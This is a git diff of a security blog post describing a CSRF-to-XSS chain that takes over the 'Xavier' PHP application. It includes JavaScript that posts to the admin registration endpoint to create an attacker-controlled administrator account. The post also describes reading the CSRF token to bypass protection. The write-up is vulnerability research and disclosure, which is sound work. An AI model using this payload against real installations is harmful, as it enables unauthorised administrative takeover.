ch4n3l/ch4n3l.github.io/_posts/2017/2019-07-22-xavier-csrf-to-xss-takeover.md

 With that in mind, I set off to find a way to be able to takeover the application chaining these two bugs.

-xyz (Simialr to my earlier post)

 I then wrote simple Javascript, when called will create a new user and then promote the user.
-This is able to bypass SOP, as the request will be executing from the application, and furthermore is able to bypass the CSRF protection when promoting a user to the administrator as we can create an XMLHTTPRequest to parse the CSRF token and then include it with our request.
+This is able to bypass SOP, as the request will be executing from the application.
+Furthermore this is also able to bypass the CSRF protection when promoting a user to the administrator as we can create an XMLHTTPRequest to parse the CSRF token and then include it with our subsequent request.

 If you host the following Javascript on your site:
 ~~~
 var root = "";
 var req = new XMLHttpRequest();
 var url = root + "/xavier-demo/admin/includes/adminprocess.php";
-var params = "user=Hackerman&firstname=Hackerman&lastname=Hackerman&pass=SupermanSuperman&conf_pass=SupermanSuperman& email=Hackerman%40Superman.com&conf_email=Hackerman%40Superman.com&form_submission=admin_registration";
+var params = "user=Hackerman&firstname=Hackerman&lastname=Hackerman&pass=P4ssw0rd&conf_pass=P4ssw0rd& email=Hackerman%40Superman.com&conf_email=Hackerman%40Superman.com&form_submission=admin_registration";
 req.open("POST", url, true);
 req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 req.send(params);